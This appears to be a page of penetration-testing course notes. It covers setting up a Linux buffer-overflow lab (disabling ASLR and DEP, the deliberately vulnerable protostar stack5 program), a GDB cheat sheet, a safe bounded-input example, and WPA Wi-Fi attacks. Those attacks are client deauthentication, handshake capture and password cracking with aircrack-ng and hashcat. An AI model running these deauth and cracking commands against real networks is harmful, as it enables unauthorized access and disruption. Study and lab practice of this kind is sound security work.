Linux BOF & Wireless Attacks

Environment setup

  1. Install edb

sudo apt-get install edb
  2. Disable ASLR and DEP on Linux (the default value of randomize_va_space is 2; restore it once the exercise is done)

sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
cat /proc/sys/kernel/randomize_va_space

sudo nano /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash noexec=off noexec32=off clearcpuid=514"
sudo update-grub
sudo reboot
  3. edb is pretty much the same as Immunity Debugger; you can follow the same steps we used on Windows.

GDB Basics Cheat Sheet

Starting and Quitting

  • gdb <program>: Start GDB with a program.

  • run or r: Start the program.

  • quit or q: Exit GDB.

Breakpoints

  • break <location> or b <location>: Set a breakpoint.

  • info breakpoints or i b: List breakpoints.

  • delete <num> or d <num>: Delete a breakpoint.

Stepping and Continuing

  • next or n: Step to the next line (skip functions).

  • step or s: Step into a function.

  • continue or c: Continue execution.

Inspecting Variables and Memory

  • print <expr> or p <expr>: Print value of an expression.

  • x/<format> <address>: Examine memory (e.g., x/4x for 4 hex values).

  • info locals: Show local variables.

Stack and Frames

  • backtrace or bt: Show the call stack.

  • frame <num> or f <num>: Switch to a frame.

  • info frame: Show details of the current frame.

Running and Control

  • kill: Stop program execution.

  • jump <location>: Jump to a line or address.

Threads

  • info threads: List threads.

  • thread <num>: Switch to a thread.

Exploit Vuln program

  • protostar stack5 (the vulnerable program: gets() reads an unbounded line into a 64-byte stack buffer)

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);   /* no length check: input longer than 64 bytes overwrites the stack */
}
  • compile a 32-bit binary with no ASLR (-no-pie) and no stack protection (-fno-stack-protector)

gcc -m32 -no-pie -fno-stack-protector stack5.c -o stack5
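As an added example (not part of the original cheat sheet or of protostar), the same 64-byte read done safely: a bounded replacement for the gets() call, plus a small harness that feeds constructed input through it via a temporary file so the truncation behaviour can be checked.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* same buffer size as stack5 */
/* Bounded replacement for stack5's gets(): reads at most size-1 bytes,
 * always NUL-terminates, strips the newline and drains the rest of an
 * over-long line so it cannot leak into the next read. Returns 1 if a
 * line was read, 0 on EOF; *truncated is set when input had to be cut. */
int read_line_bounded(FILE *in, char *buf, size_t size, int *truncated)
{
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return 0;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';                 /* whole line fit */
    } else {                                 /* no newline: discard overflow */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return 1;
}

/* Harness: feed a constructed input string through the reader via an
 * ISO C temporary file, so behaviour can be checked without real stdin. */
static int run_case(const char *input, char *out, size_t size, int *truncated)
{
    FILE *f = tmpfile();
    if (f == NULL) return 0;
    fputs(input, f);
    rewind(f);
    int ok = read_line_bounded(f, out, size, truncated);
    fclose(f);
    return ok;
}

size_t kept_length(const char *input)      /* bytes kept, 0 if nothing read */
{
    char buf[BUF_SIZE]; int trunc;
    return run_case(input, buf, sizeof buf, &trunc) ? strlen(buf) : 0;
}

int was_truncated(const char *input)       /* 1 if input exceeded the buffer */
{
    char buf[BUF_SIZE]; int trunc = 0;
    run_case(input, buf, sizeof buf, &trunc);
    return trunc;
}
```

In stack5 itself, `read_line_bounded(stdin, buffer, sizeof buffer, &truncated)` is the drop-in for the `gets(buffer)` call.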

Wireless

Config Adapter TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]

  • check Adapter info

iwconfig
lsusb
  • install required drivers

sudo apt install realtek-rtl8188eus-dkms -y

start monitoring

  • Kill the processes that would interfere with monitor mode (NetworkManager, wpa_supplicant):

sudo airmon-ng check kill
  • Start monitor mode on the wireless interface; this renames the interface to wlan0mon

sudo airmon-ng start wlan0
  • Now let's capture the wireless frames in the air around us to see which Wi-Fi networks are available.

sudo airodump-ng wlan0mon

BSSID: The MAC address (unique identifier) of the access point or router.

ESSID: The network name (SSID) broadcast by the access point.

ENC: The encryption protocol used (e.g., WEP, WPA, WPA2).

Cipher: The encryption algorithm used for securing the data (e.g., CCMP, TKIP).

Auth: The authentication method (e.g., PSK, MGT) used to verify devices connecting to the network.

Channel: The channel (frequency) on which the access point is operating.

Network power:

Attacking target:

  • Capture the target's traffic to/from its clients to get authentication handshakes.

sudo airodump-ng -w captures -c <channel> --bssid <MAC Address> wlan0mon
  • De-authenticate all clients so they re-authenticate, then capture the authentication packets.

sudo aireplay-ng --deauth 0 -a <MAC Address of AP> wlan0mon
  • Now try to capture the authentication handshakes again.

Inspecting the captured traffic with Wireshark (the -w captures prefix above produces captures-01.cap):

wireshark captures-01.cap

In Wireshark, filter with eapol to get the 4-way handshake for Wi-Fi connections.

Cracking Authentication keys

  • Put the interface back to managed mode

sudo airmon-ng stop wlan0mon
  • Cracking

sudo aircrack-ng <pcap-file> -w /usr/share/wordlists/rockyou.txt

Cracking with hashcat

Convert the cap file to a hash with hashcat-utils or using this web app:

https://hashcat.net/cap2hashcat/

./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
  1. Brute force attack for 8 digits

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d
  2. Brute force attack for 8 characters from the full printable set

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?a?a?a?a?a?a?a?a

?a: matches any printable ASCII character (lowercase, uppercase, digits and symbols).

  3. Brute force 8 lowercase letters

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?l?l?l?l?l?l?l?l
  4. Brute force attack for 8 to 11 digits (the mask must contain at least --increment-max positions, so 11 ?d here)

hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d?d?d?d --increment --increment-min=8 --increment-max=11

Last updated 8 months ago